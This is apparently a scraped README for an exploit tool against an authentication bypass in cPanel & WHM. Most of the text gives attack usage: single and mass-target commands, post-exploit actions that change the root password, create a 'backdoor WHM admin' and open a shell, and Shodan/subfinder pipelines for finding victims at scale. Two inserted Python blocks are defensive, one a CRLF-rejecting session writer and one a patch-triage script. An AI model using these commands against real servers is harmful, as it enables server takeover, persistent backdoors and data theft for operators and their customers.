## https://sploitus.com/exploit?id=B4A0D8E4-449F-53A9-90ED-6F8D2F6BE281
# CVE-2026-41940
> **⚠ This tool is created solely for educational or bug bounty purposes only. Unauthorized use outside of controlled environments is strictly prohibited.**

## Description
A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthenticated attackers to gain root-level WHM access by injecting CRLF sequences into server-side session files via the Authorization header, with no credentials required.

## How it works
CVE-2026-41940, in general terms, is exploited through a breakdown in how the system handles authentication sessions in cPanel/WHM. The attack typically begins with a normal request to the login interface, where the application prematurely initializes a session before fully validating user credentials. Because of improper handling of session-related input, certain crafted or unexpected input structures can alter how session data is stored or interpreted by the server.
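
The mitigation for this class of bug, as an added example (not cPanel's code and not part of this repository): a session writer that refuses control characters, so a header-derived value can never become more than one record. The `key=value` file format and every name below are assumptions made for illustration.

```python
# Added illustration: hypothetical key=value session file, not cPanel's real format.
import re

_KEY_RE = re.compile(r"[a-z_]{1,32}")
# CR, LF, NUL, other C0 controls, DEL, and the Unicode line separators that
# str.splitlines() would also treat as record boundaries.
_CONTROL_RE = re.compile("[\x00-\x1f\x7f\x85\u2028\u2029]")


class SessionFieldError(ValueError):
    """Raised when a field cannot be stored as exactly one record."""


def serialize_session(fields):
    """Serialize fields as one 'key=value' line each, refusing control characters."""
    lines = []
    for key, value in fields.items():
        if not _KEY_RE.fullmatch(key):
            raise SessionFieldError(f"bad key: {key!r}")
        if _CONTROL_RE.search(value):
            # A CR or LF here would start a new record in the file.
            raise SessionFieldError(f"control character in {key!r}")
        lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n"


def parse_session(text):
    """Parse the file back; a duplicate key is an integrity error, not last-wins."""
    parsed = {}
    for line in text.rstrip("\n").split("\n"):
        key, sep, value = line.partition("=")
        if not sep or key in parsed:
            raise SessionFieldError(f"malformed or duplicate record: {line!r}")
        parsed[key] = value
    return parsed


def store_preauth_session(header_value):
    """Build the session file text for a request that has not authenticated yet."""
    # 'authenticated' is set by the server only, never copied from request data.
    return serialize_session({"authenticated": "0", "client_hint": header_value})
```

Rejecting the value outright, rather than stripping the control characters and storing the rest, keeps the request visible as an error that can be logged and alerted on.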

## Affected versions

| Version | Vulnerable | Patched |
|--------|-----------|---------|
| 110.x | ≤ 11.110.0.96 | **11.110.0.97** |
| 118.x | ≤ 11.118.0.62 | **11.118.0.63** |
| 126.x | ≤ 11.126.0.53 | **11.126.0.54** |
| 132.x | ≤ 11.132.0.28 | **11.132.0.29** |
| 134.x | ≤ 11.134.0.19 | **11.134.0.20** |
| 136.x | ≤ 11.136.0.4  | **11.136.0.5**  |
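
For patch triage against the table above, an added example (not part of this repository) that classifies the version strings in a server inventory by release tier and build. The hostnames and versions in the sample inventory are constructed, and accepting a version written without the leading `11.` is an assumption.

```python
# Added example: patched builds copied from the "Affected versions" table above.
import re

PATCHED_BUILD = {  # tier -> first patched build (11.<tier>.0.<build>)
    110: 97, 118: 63, 126: 54, 132: 29, 134: 20, 136: 5,
}
_VERSION_RE = re.compile(r"(?:11\.)?(\d{2,3})\.(\d+)\.(\d+)")


def classify(version):
    """Return 'vulnerable', 'patched', 'unlisted-tier' or 'unparseable'."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        return "unparseable"
    tier, minor, build = (int(g) for g in m.groups())
    if tier not in PATCHED_BUILD:
        # The table says nothing about this tier; do not assume it is safe.
        return "unlisted-tier"
    # Every table entry has minor 0, so compare (minor, build) as a pair.
    if (minor, build) >= (0, PATCHED_BUILD[tier]):
        return "patched"
    return "vulnerable"


def triage(inventory):
    """Return (host, status) for every host needing action, worst first."""
    order = {"vulnerable": 0, "unlisted-tier": 1, "unparseable": 2}
    flagged = [(h, classify(v)) for h, v in inventory.items()]
    flagged = [(h, s) for h, s in flagged if s != "patched"]
    return sorted(flagged, key=lambda hs: (order[hs[1]], hs[0]))


# Constructed inventory (hostnames and versions are made up for the example).
SAMPLE_INVENTORY = {
    "web01.example.net": "11.110.0.96",
    "web02.example.net": "11.110.0.97",
    "web03.example.net": "126.0.54",
    "web04.example.net": "11.120.0.12",
    "web05.example.net": "unknown",
    "web06.example.net": "11.136.0.4",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY):
        print(f"{status:14} {host}")
```

Hosts reported as `unlisted-tier` or `unparseable` need a manual check, since the table gives no patched build for them.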

---

## Installation (Windows/Mac OS)

```bash
git clone https://github.com/clsmight/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python exp.py
# MacOS/Linux
python3 exp.py
```

# How to use
The tool expects a target domain to be specified.

Single target mode:
```bash
python exp.py -u https://target1.com:2083
```
You can also scan the targets listed in a `target.txt` file (create it first):
```bash
python exp.py -l target.txt -t 50 -o result.json
```
## Basic scan:

Available commands:
```bash
python exp.py -u https://victim1.com:2083 # single target scan
python exp.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python exp.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.
```

# Post-Exploit actions

```bash
# List all accounts on the server
python exp.py list -u https://target.com:2087

# OS command
python exp.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python exp.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python exp.py info -u https://target.com:2087

# Change root password
python exp.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python exp.py shell -u https://target.com:2087
```
# Pipelines
```bash
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python exp.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python exp.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python exp.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python exp.py -t 20 --action list
```

# WHM Shell mode
After a successful execution, you can open an interactive WHM shell:
```bash
python exp.py shell -u
```

### All shell Commands

| Command | Description |
|---------|-------------|
| `id` | Show User ID |
| `hostname` | Get server hostname |
| `accounts` | List all user accounts |
| `info` | Load, disk, MySQL host, version |
| `cat ` | Read file content |
| `exec ` | Execute OS command |
| `newadmin  ` | Create backdoor WHM admin |
| `passwd ` | Change root password |
| `l [path]` | List directory |
| `help` | Show all commands |
| `exit` | Exit shell mode |

---

# CLI Reference

```
usage: exp.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors
```

# Disclaimer 

**⚠ This tool is created solely for educational or bug bounty purposes only. Unauthorized use outside of controlled environments is strictly prohibited.**